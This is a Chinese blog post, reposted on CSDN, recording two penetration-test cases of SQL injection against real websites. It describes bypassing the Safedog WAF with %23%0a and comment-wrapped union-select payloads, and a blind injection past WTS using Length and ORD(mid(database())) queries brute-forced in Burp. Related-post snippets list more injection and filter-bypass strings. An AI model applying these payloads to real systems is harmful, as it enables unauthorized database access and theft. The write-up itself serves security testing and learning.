payload sql注入_记录几个实战sql绕过

最新推荐文章于 2024-03-21 09:55:49 发布
最新推荐文章于 2024-03-21 09:55:49 发布
阅读量251 收藏
点赞数
文章标签: payload sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39872872/article/details/111621838
版权

前段时间的几次渗透测试中有几个有意思的sql注入,记录一下注入的绕过过程,网站地址及部分信息都有模糊处理,并已反映给相关单位。

0x01 案例一 绕安全狗

加',报错,连sql语句都给了出来,典型的注入,原本以为属于可以直接一把梭的站

a9ff6d19400cd9c99b548b1ad5b5f340.png

order by查字段遭遇安全狗拦截

0088f20cf7e6a8f75c75dd0ba33d6a6f.png

现在需要手动绕过,感觉这个安全狗应该是比较老的版本

过滤字符:

order by

union select

Length(database())

……

不过滤单个字符,只过滤了相关组合查询语句,一番手动测试成功测出%23%0a可以绕过安全狗拦截

查字段payload:

%20order%23%0aby%2013%23

%23: #

%0a: 换行符

70721512caf590c36434250db713bdd7.png

根据是否报错,查询出有13个字段,但是当使用联合查询注入或盲注时这个payload失效,再次绕过安全狗

终极bypass如下,采用注释绕过,同时#必须用%23,不然会被安全狗拦截

/*&ID=-20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13%23*/

3fd48de1d5a7818c102627a5cf6b8dde.png

0x02 案例二 盲注绕WTS

查询字段很顺利,直接order by 2查出2个字段但是联合查询注入失败,各种绕过都试了下均失败

a42ac099e9a806ffdfe71732e6845415.png

又试了下盲注,居然过了,只是过程稍显麻烦

数据库长度为9

and Length(database())>9%23

然后burp抓包,设置爆破范围

379e881bae7f4898fcff187cdd87f1e0.png

and ORD(mid(database(),1,1))=95%23

设置AIISC范围95~122,因为mysql默认不区分大小写,默认都为小写

b0aa9c3e80a2ab582e3a33483a9e6706.png

一位一位爆库

258f6ca6125d5978d1c6c97fc2293ac0.png

不再赘述。

作者:zjun     文章来源:https://www.zjun.info/2020/sqlina.html

关注公众号:HACK之道

5237b05c1d07da422cfc3548f9394c72.png

weixin_39872872
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL_Injection_PayloadSQL注入有效负载列表
01-28
SQL_Injection_PayloadSQL注入有效负载列表
sql注入payload总结
recover517的博客
03-04 8329
个人经验网上的wp总结的注入类型,附上sqlmap命令
【WEB安全】SQL注入 payload
qq_42322144的博客
12-16 2982
'"!@#)\(/?; ' " OR 1=1 OR 1=0 OR 1=1 -- OR 1=0 -- ' OR '1'='1 ' OR '1'='0 ' OR 1=1 -- ' OR 1=0 -- " OR "1"="1 " OR "1"="0 " OR 1=1 -- " OR 1=0 -- ") OR 1=1 -- ") OR 1=0 -- ') OR 1=1 -- ') OR 1=0 -- AND 1=1 AND 1=0 AND 1=1 -- AND 1=0 --
SQL注入攻击payload列表:强您的安全防护
最新发布
gitblog_00030的博客
03-21 393
SQL注入攻击payload列表:强您的安全防护 项目地址:https://gitcode.com/payloadbox/sql-injection-payload-list 项目链接 项目简介 在网络安全领域,SQL注入是一种常见的攻击手段,通过构造恶意的SQL语句以获取、修改或破坏数据库信息。sql-injection-payload-list 是一个由PayloadBox维护的开源项目,旨...
SQL注入sqlmap布尔型盲注payload解析
无名J0kзr的博客
10-07 3774
难受 占坑明天更
最常见的SQL报错注入函数(floor、updatexml、extractvalue)及payload总结
Welcome To Myon'Blog !
12-24 3093
extractvalue() 能查询字符串的最大长度为 32,如果我们想要的结果超过 32,就要用 substring() 函数截取或 limit 分页,一次查看最多 32 位。其实有时候我们可以使用group_concat()将所以查询内容列出,但是要取决于题目具体环境,如果无法使用,则使用limit语句来限制查询结果的列数,逐条查询。但是这里回显要么存在,要么无回显,因此无法使用联合查询注入,而且也不存在回显为真或者假两种情况,排除掉盲注,那么这关需要使用的是报错注入。
DVWA—SQL注入(判断数字型和字符型的有效快速方式、union和报错注入的实现、payload提供)
weixin_46709219的博客
12-12 2235
关于 SQL注入攻击包括通过从客户端到应用程序的输入数据插入或“注入” SQL查询。成功的SQL注入漏洞可以从数据库读取敏感数据,修改数据库数据(插入/更新/删除),对数据库执行管理操作(例如关闭DBMS),恢复DBMS文件上存在的给定文件的内容系统(load_file),并在某些情况下向操作系统发出命令。 SQL注入攻击是一种注入攻击,其中SQL命令被注入到数据平面输入中以实现预定义的SQL命令的执行。 此攻击也可能称为“ SQLi”。 目的 数据库中有5个用户,其ID为1至5。您的任务…通过SQLi窃取
Payload_Dumber_x64.zip
07-04
刷机包payload.bin解包工具
Payload_Dumber_x64.7z
10-14
刷机包payload.bin解包工具
payload_dumper_tool_by_ius_payload_dumper_payload_dumper.py_andr
10-01
payload dumper extract boot.img and others
Payload_Dumber_x64.rar
06-15
Payload_Dumber_x64.rar
SQL注入Playload List
qq_52014772的博客
07-22 1070
SQL注入是一个网络安全漏洞,它使攻击者能够干扰应用程序对其数据库的查询。 SQL注入类型 类型 描述 In-band SQLi (Classic SQLi) In-band SQLi注入是SQL注入攻击中最常见和最容易利用的。当攻击者能够使用相同的查询发起攻击并收集结果时,就会发生In-band SQLi注入。In-band SQLi注入的两种最常见类型是基于错误的SQLi和基于联合的SQLi。 Error-based SQLi 基于错误的SQLi是一种In-band..
sql server 字段密码解密_SQL注入漏洞测试
weixin_39927059的博客
12-07 947
SQL注入漏洞测试 --Write Up题目用到的工具AES密网站:http://tool.chacuo.net/cryptaesBASE64密网站:https://www.sojson.com/base64.htmlMD5密网站:https://www.cmd5.com/1.靶场https://www.mozhe.cn/bug/deta...
SQLMAP注入过程payload分析
热门推荐
Breeze的博客
03-31 2万+
众所周知,sqlmap是一款命令自动SQL注入工具,功能非常之多,几乎是用于所有场景,研究分析sqlmap的注入payload过程能使我们对SQL注入的理解更深刻,也能在以后在一些手工测试的场合拥有更多的思路。 今天我们以一个实际的上海某企业的案例来分析一下sqlmap在基于布尔型盲注的时候的工作思路和注入payload的原理。 目标站点url:http://www.xxxxxxx.com....
SQL注入payload(持续更新)
Zeker62的博客
08-31 2542
id='1' order by 3 --+ //%20是空格,%23是# id='2' and 1=2 union select 1,2,datbase()--+ //查数据库 id='3' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ //查表 id='4' and 1=2 union select 1,2,group_co
sql注入payload
专注企业信息安全-sec
04-12 3850
分享一些平时测试用的sql payloads 1:BOOL SQLINJECTION \ ' " %df' %df" and 1=1 and 1=2 ' and '1'='1 ' and '1'='2 " and "1"="1 " and "1"="2 ) and (1=1 ) and (1=2 ') and ('1'='1 ') and ('1'='2 %' and 1=1 and '%'...
渗透之——SQL注入绕过技术总结
冰河的专栏
01-05 4604
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85869703 1.绕过空格(注释符/* */,%a0) 两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方法,用注释替换空格: /* 注释 */ 使用...
渗透学习日记day14(sql注入payload
qq_44836237的博客
12-09 508
Union 查询利用条件:页面要有回显点 无回显点: 单双引号看是否报错,若报错,判断是否为整数型 猜测查询语句:如果是整数型用sleep()函数会延迟 若为整数型:select * from xxx where id = 1 and sleep(3) 会延迟 若是字符串型:select * from xxx where id = '1 and sleep(3)' 不会延迟 这里得知sqli-labs第二关是整数型无回显但是可以报错 通过以下paylo...
SQL注入绕过技巧
weixin_33970449的博客
07-29 1011
1.绕过空格(注释符/* */,%a0):   两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方法,用注释替换空格: /* 注释 */ 使用浮点数: select * from users where id=8E0union select 1,2,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值